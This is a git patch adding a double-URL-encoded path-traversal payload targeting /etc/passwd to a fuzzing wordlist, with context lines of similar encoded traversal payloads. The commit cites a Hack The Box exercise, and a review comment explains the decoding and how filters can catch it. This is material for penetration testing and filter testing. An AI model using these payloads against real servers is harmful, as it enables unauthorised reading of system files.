From df52bacdd6f64af7f61f8fb56729e3827af01b6f Mon Sep 17 00:00:00 2001
From: Najam Ul Saqib
Date: Thu, 9 Feb 2023 04:16:54 -0800
Subject: [PATCH] Update dirTraversal-nix.txt

Double encode the payload `../../../../../../../../etc/passwd` using mechanism https://owasp.org/www-community/Double_Encoding, it is being practiced to exploit LFI at box "broscience" in hackthebox
---
 wordlist/vulns/dirTraversal-nix.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/wordlist/vulns/dirTraversal-nix.txt b/wordlist/vulns/dirTraversal-nix.txt
index b2a88a86..af9d7779 100644
--- a/wordlist/vulns/dirTraversal-nix.txt
+++ b/wordlist/vulns/dirTraversal-nix.txt
@@ -30,6 +30,7 @@
 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
+%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
 ..%252f/etc/passwd
 ..%252f..%252f/etc/passwd
 ..%252f..%252f..%252f/etc/passwd
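Review bot: The added line is written in a different encoding style from both neighbouring families, and nothing in the hunk records how it decodes. It percent-encodes every byte of the single-encoded string, hex digits and the `etc/passwd` target included (`%25%32%65` decodes once to `%2e`, twice to `.`), whereas the `..%252f` entries below encode only the `%` and the `%2e%2e%2f` entries above leave `/etc/passwd` literal. The .txt wordlist has no comment syntax, so I would state this in the commit description, e.g. `Every byte of the single-encoded form is percent-encoded again; two decode passes yield the path quoted above.` For anyone using the list to test a filter, a rule that matches only `%252e`/`%252f` will not match this form. The control under test should therefore decode until the value stops changing, or reject input that still contains `%` after one decode, before its path check.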